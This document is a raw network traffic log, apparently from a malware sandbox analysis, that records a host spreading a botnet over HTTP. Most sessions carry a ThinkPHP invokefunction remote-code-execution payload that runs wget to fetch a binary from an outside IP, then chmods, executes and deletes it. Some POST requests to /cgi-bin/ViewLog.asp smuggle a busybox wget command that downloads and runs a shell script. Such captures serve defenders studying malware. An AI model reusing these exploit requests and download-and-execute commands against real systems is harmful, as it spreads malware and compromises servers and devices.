Feb 25, 2024 19:03:38.797770023 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:39.002238989 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
458	192.168.2.15	57950	95.213.54.99	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.938941002 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:39.143013000 CET	353	IN	HTTP/1.1 400 Bad Request Server: kittenx Date: Sun, 25 Feb 2024 18:03:39 GMT Content-Type: text/html Content-Length: 152 Connection: close Strict-Transport-Security: max-age=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6b 69 74 74 65 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>kittenx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
459	192.168.2.15	54768	95.101.0.73	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.946144104 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:39.172583103 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:39 GMT Date: Sun, 25 Feb 2024 18:03:39 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 34 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 31 39 26 23 34 36 3b 31 64 36 65 31 63 61 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.c4b0f748.1708884219.1d6e1cae</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
460	192.168.2.15	43982	95.0.0.212	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.971468925 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:39.211131096 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:38 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:03:39.211149931 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:03:39.211293936 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:03:39.211313963 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:03:39.211330891 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:03:39.211349964 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:03:39.211407900 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:03:39.211425066 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to 185-146-88-128.cprapid.com's <a href="mailto:serve
Feb 25, 2024 19:03:39.211512089 CET	354	IN	Data Raw: 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 Data Ascii: go&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 201

Session ID	Source IP	Source Port	Destination IP	Destination Port
461	192.168.2.15	41672	88.198.59.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:38.981928110 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:39.166126966 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:39 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:03:39.166146040 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:03:39.166227102 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:03:39.166249037 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:03:39.166269064 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:03:39.166287899 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Feb 25, 2024 19:03:39.166307926 CET	1096	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Feb 25, 2024 19:03:39.166328907 CET	1286	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to elvira.nexnova.com's <a href="mailto:nexnovati@gma
Feb 25, 2024 19:03:39.166356087 CET	344	IN	Data Raw: 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 Data Ascii: tent=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel,

Session ID	Source IP	Source Port	Destination IP	Destination Port
462	192.168.2.15	53100	31.136.19.22	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:39.125595093 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:39.685956001 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
